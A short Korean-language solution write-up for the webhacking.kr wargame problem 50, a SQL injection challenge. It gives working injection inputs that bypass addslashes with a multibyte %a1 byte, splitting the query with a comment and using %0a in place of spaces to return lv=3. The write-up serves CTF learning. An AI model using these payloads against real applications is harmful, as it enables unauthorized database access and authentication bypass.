[webhacking.kr] 50번 문제

450점인 50번 문제를 풀어보자.

addslashes() : DB에서 ', ", /, Null Byte 와 같이 특수문자들을 이스케이프 처리해주는 함수

mb_convert_encoding(문자열,바꿀 인코딩,현재인코딩); : 인코딩 변환

id와 pw에는 from, pw, (, ), 공백, %, =, >, < 문자열을 필터링 된다. id에는 추가적으로 union 문자열이 필터링 된다.

최종적으로 쿼리의 결과가 lv=3이면 문제가 풀리게 된다.

 

id = guest%a1'/*

pw = */union%0aselect%0a3#

id와 pw값을 이렇게 넣어주게 되면 /**/부분이 주석처리가 되므로 pw부분은 생략이 가능하여 union select구문을 이용하여 바로 3을 반환시킬 수 있다.

select lv from members where id='guest%a1' /*and pw=md5('*/union select 3#')